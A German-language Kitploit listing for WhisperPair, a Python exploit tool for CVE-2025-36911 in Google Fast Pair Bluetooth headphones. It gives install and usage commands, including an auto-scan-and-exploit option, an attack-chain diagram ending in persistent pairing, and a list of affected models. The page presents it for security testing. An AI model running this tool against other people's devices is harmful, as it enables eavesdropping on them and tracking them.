Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-36911-exploit — Exploit der CVE-2025-36911 Sicherheitslücke in Python zum Testen unserer eigenen Ausrüstung | Kitploit
Tools/GitHubGitHub/penthertz/cve-2025-36911-exploit
AufklärungBluetooth-SicherheitSchwachstellenanalyseExploitationDrahtlose SicherheitPenetrationstests
GitHubpenthertz/cve-2025-36911-exploit

CVE-2025-36911-exploit

Exploit der CVE-2025-36911 Sicherheitslücke in Python zum Testen unserer eigenen Ausrüstung

Repository anzeigen
261vor 6 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WhisperPair Python CLI

Fast Pair CVE-2025-36911 Exploit-Tool in Python zum Testen unserer Geräte

CVE Python

Autor: Sébastien Dudek (@FlUxIuS) @ Penthertz
Danksagung: whisperpair.eu für die Entdeckung und diese nette APK von @ZalexDev, die die Zeit für die Implementierung verkürzt hat wpair-app


⚠️ Haftungsausschluss

Nur für autorisierte Sicherheitsforschung. Testen Sie nur an eigenen Geräten.


🐛 Die Schwachstelle

CVE-2025-36911 betrifft Google Fast Pair-Implementierungen auf Millionen von Bluetooth-Audiogeräten.

Normales Verhalten: Geräte sollten Pairing-Anfragen nur im Pairing-Modus akzeptieren (Taste gedrückt, Gehäuse geöffnet usw.)

Verwundbares Verhalten: Geräte akzeptieren schlüsselbasierte Pairing-Anfragen (KBP) jederzeit, selbst wenn sie im Leerlauf oder bereits gekoppelt sind.

Auswirkungen

  • 🔊 Unautorisierte Kopplung an die Ohrhörer/Kopfhörer des Opfers
  • 🎤 Potenzielle Audio-Injektion/Abhören
  • 📍 Geräteverfolgung über Kontoschlüssel

⚡ Schnellstart

root@kitploit:~
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit

# Scan for targets
python3 whisperpair-cli.py scan

# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF

# Exploit
python3 whisperpair-cli.py exploit --quick

🎯 Exploit-Strategie

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  ATTACKER                           VULNERABLE DEVICE       │
│                                                             │
│  1. BLE Scan ─────────────────────► Fast Pair Advertisement │
│     (Find target)                   (Model ID visible)      │
│                                                             │
│  2. Connect ──────────────────────► GATT Connection         │
│                                                             │
│  3. KBP Request ──────────────────► Key-Based Pairing Char  │
│     (Should be rejected             ✗ NOT REJECTED!         │
│      when not in pairing mode)      (CVE-2025-36911)        │
│                                                             │
│  4. Parse Response ◄────────────── BR/EDR Address           │
│                                                             │
│  5. Write Account Key ────────────► Account Key Char        │
│     (Persistent access)             ✓ ACCEPTED              │
│                                                             │
│  6. Classic BT Pair ──────────────► Audio Profiles (A2DP)   │
│     (Game over)                                             │
└─────────────────────────────────────────────────────────────┘

Das Tool probiert automatisch mehrere Strategien aus:

  1. ENCRYPTED_ECDH - Spezifikationskonforme 80-Byte-verschlüsselte Anfrage
  2. RAW_WITH_PUBKEY - Rohblock + öffentlicher Schlüssel (einige Geräte)
  3. RAW_KBP - Einfache 16-Byte-Anfrage (defekte Implementierungen)

Weitere Informationen hier


📋 Befehle


🎧 Betroffene Geräte

Getestet verwundbar (prüfen Sie Firmware-Updates):

Tool herunterladen
BefehlBeschreibung
scanLive-aktualisierender BLE-Scan nach Fast-Pair-Geräten
scan -aAlle BLE-Geräte scannen
info <addr>GATT-Dienste/-Eigenschaften anzeigen
test <addr>Nicht-invasiver Schwachstellen-Check
exploit <addr>Vollständige Exploit-Kette
exploit -qAuto-Scan und erstes Ziel ausnutzen
MarkeModelle
GooglePixel Buds Pro 2 (erhält aber mit Pixel-Telefonen ziemlich schnell Updates)
SonyWH-1000XM4, WH-1000XM5/XM6, LinkBuds S, WH-CH520
JBLJBL TUNE BEAM
AnkerSoundcore Liberty 4 NC
JabraElite 8 Active
+ viele weiterewhisperpair.eu